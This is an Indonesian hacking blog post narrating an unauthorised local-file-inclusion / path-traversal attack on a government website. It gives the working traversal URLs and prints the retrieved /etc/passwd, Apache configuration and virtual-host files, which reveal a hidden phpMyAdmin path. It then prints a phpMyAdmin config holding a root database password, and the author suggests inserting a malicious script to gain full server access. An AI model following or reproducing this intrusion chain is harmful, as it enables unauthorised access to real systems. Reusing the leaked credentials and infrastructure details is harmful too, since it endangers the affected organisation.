\
Powered by Blogger.

Blog Archive

Tags:

Bug Local File Inclusion .go.id

By admin → Monday, April 1, 2013
hai kembali lagi bersama saya cyberbaghost si raja tega hahaha :D Saya akan mempergunakan bug sederhana pada situs .gov, Local File Inclusion,
kalo saya bilang mungkin eksekusinya paling hanya beberapa menit saja :D Tapi
sekali lagi yang saya titik beratkan disini adalah pola berfikir kritisnya :)

Waktu itu saya sedang browsing mencari satu artikel pada salah satu situs
pemerintah www.somename.go.id nah artikel yang saya cari ternyata bisa
didownload berbentuk pdf di url ini

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=index_buku&mn=6&smn=f

disitu saya liat url untuk mendownloadnya adalah

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=WDR_2008_eng_web.pdf

Pemikiran iseng mulai muncul, bagaimana jika namafile=WDR_2008_eng_web.pdf saya
ganti menjadi sesuatu.

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=blablu.pdf

nah WDR_2008_eng_web.pdf saya ubah menjadi blablu.pdf, ternyata aplikasi web
tadi memperbolehkan saya untuk mendownload blablu.pdf seolah2 file tersebut
ada, lalu saya ingin mencoba memasukkan path system

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=../../../etc/passwd

ternyata dia mendownload file juga, tapi isinya kosong, saya asumsikan bahwa
aplikasi diberikan permission yang cukup tinggi untuk mengakses file2 sensitif
pada server, saya trial and error aja jika begitu, sehingga mencapai url

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=../../../../../../../../../../../etc/passwd

nah disini akhirnya file passwd terdownload dengan sempurna

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
aman:*:1001:1001:User &:/home/aman:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin

ya sudah, sampe di sini saya tidak akan memberikan URL lanjutannya, saya hanya
akan memberikan pola berpikir iseng saya

- step berikutnya saya berfikir, saya harus mencari dimana letak file2 sensitif
yang bermanfaat tentunya, karena posisi saya sedang berada di satu warnet
(anggaplah begitu) yang tidak memungkinkan saya menjalankan tools, scanner,
atau apalah yang semacamnya

- yang saya fikir pertama tentunya dimana letak konfigurasi webserver
- saya harus mengetahui versi dari web server, daemon web server, serta
operating sistem yang digunakan
- banyak situs di web yang bisa digunakan untuk mencari informasi ini, saya
dapatkan informasi bahwa OS nya adalah FreeBSD dengan Apache 2.2 sebagai
webserver
- Lalu saya googling dengen k/w "httpd.conf in freebsd apache 2.2" muncullah
hasil /usr/local/etc/apache22/httpd.conf
- Kemudian saya download httpd.conf dengan menggunakan metoda di atas, muncul
hasil file configurasi, disana saya garis bawahi ada satu baris informasi penting

# Virtual hosts
Include etc/apache22/extra/httpd-vhosts.conf

- Saya lanjutkan pencarian ke /usr/local/etc/apache22/extra/httpd-vhosts.conf

pada file tersebut saya melihat ada baris

<VirtualHost 192.xxx.1.xxx:80>
# <VirtualHost 222.xxx.11.xxx:80>
ServerAdmin amanbudi@somename.go.id
# DocumentRoot "/usr/local/www/apache22/data/web-somename__upload@07032009/portal"
DocumentRoot "/usr/local/www/apache22/data/portal2"
ServerName www.somename.go.id

Alias /db4dm1n /usr/local/www/apache22/phpMyAdmin
<Directory /usr/local/www/apache22/phpMyAdmin>
AllowOverride All
</Directory>

- nah berarti disitulah letak phpmyadminnya, beserta url untuk mengaksesnya
lalu bagaimana dengan login dan passwordnya? Phpmyadmin bukanlah suatu
aplikasi yang aneh, sebagian besar orang rata2 pernah menggunakannya secara
umum settingan default konfigurasi ada di /phpmyadmin direktori/config.inc.php

- Lalu saya lanjutkan ke /usr/local/www/apache22/phpMyAdmin/config.inc.php

dalam file tersebut ada informasi
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'sf7100sy';

- voila, anda dapat masuk ke dalam mysqladmin, menyelipkan script jahat untuk
mendapatkan full akses dari server tersebut

Post Tags:

Ichsan Bahri

I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.

No Comment to " Bug Local File Inclusion .go.id "